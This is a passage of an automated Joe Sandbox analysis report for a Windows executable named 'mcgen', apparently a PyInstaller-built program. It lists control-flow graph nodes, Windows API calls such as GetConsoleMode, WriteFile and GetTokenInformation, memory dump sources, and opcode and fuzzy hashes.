7ff6b9f24f78 call 7ff6b9f24f58 805->815 816 7ff6b9f2bed3-7ff6b9f2bed6 805->816 817 7ff6b9f2bd73-7ff6b9f2bd7d call 7ff6b9f2a9b8 806->817 807->799 814 7ff6b9f2bd3f-7ff6b9f2bd61 ReadConsoleW 807->814 808->783 818 7ff6b9f2bcd3-7ff6b9f2bcdf 808->818 809->780 810->806 822 7ff6b9f2bdce-7ff6b9f2bde3 812->822 824 7ff6b9f2bd82-7ff6b9f2bd8c 814->824 825 7ff6b9f2bd63 GetLastError 814->825 815->806 819 7ff6b9f2bd69-7ff6b9f2bd6b call 7ff6b9f24eec 816->819 820 7ff6b9f2bedc-7ff6b9f2bede 816->820 817->765 818->783 828 7ff6b9f2bce1-7ff6b9f2bce3 818->828 819->806 820->817 822->817 831 7ff6b9f2bde5-7ff6b9f2bdf0 822->831 824->822 825->819 828->783 829 7ff6b9f2bce5-7ff6b9f2bcf5 828->829 829->783 836 7ff6b9f2be17-7ff6b9f2be1f 831->836 837 7ff6b9f2bdf2-7ff6b9f2be0b call 7ff6b9f2b6e4 831->837 840 7ff6b9f2be9b-7ff6b9f2bea8 call 7ff6b9f2b524 836->840 841 7ff6b9f2be21-7ff6b9f2be33 836->841 844 7ff6b9f2be10-7ff6b9f2be12 837->844 840->844 845 7ff6b9f2be8e-7ff6b9f2be96 841->845 846 7ff6b9f2be35 841->846 844->817 845->817 848 7ff6b9f2be3a-7ff6b9f2be41 846->848 849 7ff6b9f2be7d-7ff6b9f2be88 848->849 850 7ff6b9f2be43-7ff6b9f2be47 848->850 849->845 851 7ff6b9f2be49-7ff6b9f2be50 850->851 852 7ff6b9f2be63 850->852 851->852 854 7ff6b9f2be52-7ff6b9f2be56 851->854 853 7ff6b9f2be69-7ff6b9f2be79 852->853 853->848 856 7ff6b9f2be7b 853->856 854->852 855 7ff6b9f2be58-7ff6b9f2be61 854->855 855->853 856->845
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                                                    • Instruction ID: 006d3b17d3005e9c32159ea4518cdc4d90242bfb02967135a42b359d5e478e6f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CC1AF22A1CAC681E7609F2994403BD7768EB82BE3F554139FF5E877A1CE7CE8458701

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 995526605-0
                                                                                                                                                                                                                                                                    • Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                                                    • Instruction ID: e5e393c5b6aaa566d742854ba3eba78af2840cd0d96bb494e08d329af3ab0fce
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A217171A0C65242EB109F69F55027AA7A9FB867B2F100235EB6C83AE8DF7CD4548740

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18760: GetCurrentProcess.KERNEL32 ref: 00007FF6B9F18780
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18760: OpenProcessToken.ADVAPI32 ref: 00007FF6B9F18793
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18760: GetTokenInformation.KERNELBASE ref: 00007FF6B9F187B8
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18760: GetLastError.KERNEL32 ref: 00007FF6B9F187C2
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18760: GetTokenInformation.KERNELBASE ref: 00007FF6B9F18802
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B9F1881E
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F18760: CloseHandle.KERNEL32 ref: 00007FF6B9F18836
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF6B9F13C55), ref: 00007FF6B9F1916C
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF6B9F13C55), ref: 00007FF6B9F19175
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                    • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                    • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                                    • Instruction ID: d21f65af5ac422a8266dc68c37f508020073286cb1b907954773a6f0d236fd54
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69216D61A0C76281FB14AF24E9153EA6368EF897A2F440031EB4DD3796DF3CD8858780

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 963 7ff6b9f2cfd0-7ff6b9f2cff5 964 7ff6b9f2cffb-7ff6b9f2cffe 963->964 965 7ff6b9f2d2c3 963->965 967 7ff6b9f2d037-7ff6b9f2d063 964->967 968 7ff6b9f2d000-7ff6b9f2d032 call 7ff6b9f2a884 964->968 966 7ff6b9f2d2c5-7ff6b9f2d2d5 965->966 969 7ff6b9f2d06e-7ff6b9f2d074 967->969 970 7ff6b9f2d065-7ff6b9f2d06c 967->970 968->966 972 7ff6b9f2d076-7ff6b9f2d07f call 7ff6b9f2c390 969->972 973 7ff6b9f2d084-7ff6b9f2d099 call 7ff6b9f3398c 969->973 970->968 970->969 972->973 978 7ff6b9f2d09f-7ff6b9f2d0a8 973->978 979 7ff6b9f2d1b3-7ff6b9f2d1bc 973->979 978->979 982 7ff6b9f2d0ae-7ff6b9f2d0b2 978->982 980 7ff6b9f2d210-7ff6b9f2d235 WriteFile 979->980 981 7ff6b9f2d1be-7ff6b9f2d1c4 979->981 983 7ff6b9f2d237-7ff6b9f2d23d GetLastError 980->983 984 7ff6b9f2d240 980->984 985 7ff6b9f2d1c6-7ff6b9f2d1c9 981->985 986 7ff6b9f2d1fc-7ff6b9f2d20e call 7ff6b9f2ca88 981->986 987 7ff6b9f2d0b4-7ff6b9f2d0bc call 7ff6b9f24830 982->987 988 7ff6b9f2d0c3-7ff6b9f2d0ce 982->988 983->984 990 7ff6b9f2d243 984->990 991 7ff6b9f2d1e8-7ff6b9f2d1fa call 7ff6b9f2cca8 985->991 992 7ff6b9f2d1cb-7ff6b9f2d1ce 985->992 1006 7ff6b9f2d1a0-7ff6b9f2d1a7 986->1006 987->988 994 7ff6b9f2d0d0-7ff6b9f2d0d9 988->994 995 7ff6b9f2d0df-7ff6b9f2d0f4 GetConsoleMode 988->995 999 7ff6b9f2d248 990->999 991->1006 1000 7ff6b9f2d254-7ff6b9f2d25e 992->1000 1001 7ff6b9f2d1d4-7ff6b9f2d1e6 call 7ff6b9f2cb8c 992->1001 994->979 994->995 996 7ff6b9f2d1ac 995->996 997 7ff6b9f2d0fa-7ff6b9f2d100 995->997 996->979 1004 7ff6b9f2d189-7ff6b9f2d19b call 7ff6b9f2c610 997->1004 1005 7ff6b9f2d106-7ff6b9f2d109 997->1005 1007 7ff6b9f2d24d 999->1007 1008 7ff6b9f2d2bc-7ff6b9f2d2c1 1000->1008 1009 7ff6b9f2d260-7ff6b9f2d265 1000->1009 1001->1006 1004->1006 1013 7ff6b9f2d10b-7ff6b9f2d10e 1005->1013 1014 7ff6b9f2d114-7ff6b9f2d122 1005->1014 1006->999 1007->1000 1008->966 1015 7ff6b9f2d267-7ff6b9f2d26a 1009->1015 1016 7ff6b9f2d293-7ff6b9f2d29d 1009->1016 1013->1007 1013->1014 1020 7ff6b9f2d180-7ff6b9f2d184 1014->1020 1021 7ff6b9f2d124 1014->1021 1022 7ff6b9f2d26c-7ff6b9f2d27b 1015->1022 1023 7ff6b9f2d283-7ff6b9f2d28e call 7ff6b9f24f34 1015->1023 1018 7ff6b9f2d29f-7ff6b9f2d2a2 1016->1018 1019 7ff6b9f2d2a4-7ff6b9f2d2b3 1016->1019 1018->965 1018->1019 1019->1008 1020->990 1024 7ff6b9f2d128-7ff6b9f2d13f call 7ff6b9f33a58 1021->1024 1022->1023 1023->1016 1029 7ff6b9f2d177-7ff6b9f2d17d GetLastError 1024->1029 1030 7ff6b9f2d141-7ff6b9f2d14d 1024->1030 1029->1020 1031 7ff6b9f2d16c-7ff6b9f2d173 1030->1031 1032 7ff6b9f2d14f-7ff6b9f2d161 call 7ff6b9f33a58 1030->1032 1031->1020 1034 7ff6b9f2d175 1031->1034 1032->1029 1036 7ff6b9f2d163-7ff6b9f2d16a 1032->1036 1034->1024 1036->1031
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B9F2CFBB), ref: 00007FF6B9F2D0EC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B9F2CFBB), ref: 00007FF6B9F2D177
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                                    • Instruction ID: 4ceccccb4b6f0c78e09fc8c489e31ba53df299d7466475943cdc1dc21d1b1f5b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2891B132E1869285F760DF6D94403BD3BA8AB44BAAF144139EF4E97A95CE3CD44AC710
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                    • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                    • Instruction ID: 0a18c75c7b648be4f78a5a94379fe045307c668ac10f5f9a00a1bfae0c14b26a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04417922E2878283E7509F2595543797264FB947B5F109335EBA883AD2EF7CA5A08740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                    • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction ID: e07bbe44bbcd619e33119239165f330ff4d5713537b61c95606d1ff58c628ffb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02318CA0E0C27341FA24AF3ED4213B92799AF423A7F444438EB5DC72D7DE2CA445C291
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                                    • Instruction ID: 5fd24e318f456611d70b626a693a3268bd3db6405763536387ce25c19abf1abb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FD09E14B0C78A42EB283F785DA91782259EF48BB3F141438DA0FC7393DD7DA4894701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                    • Instruction ID: 1c19b1c5e198bacb9f7f8c0ebac55ad066965f868dc763c4b3034f1f8a7cbc30
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E751C663A092C146E6689E6D940077A7299EF46BB6F184635FF6D877C5CF3CD4018601
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                    • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction ID: 3fa5782cfb2183db67c02a04b7434ffaaeaabc0e7720b4c91186d2d3ad08411e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D11C171A18A8181DA208F29A8142697765BB85BF5F544331FF7D8B7E9CE7CD0158700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9CE
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9D8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                                    • Instruction ID: 512b3264abccd329aa7775a452b25c97201274f7ff75bf6a7b537268e7492da5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32E08650F0C64252FF145FBB54952383158AF847A3F054035EB1DC72A1DE3CA8858310
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF6B9F2AA45,?,?,00000000,00007FF6B9F2AAFA), ref: 00007FF6B9F2AC36
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF6B9F2AA45,?,?,00000000,00007FF6B9F2AAFA), ref: 00007FF6B9F2AC40
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
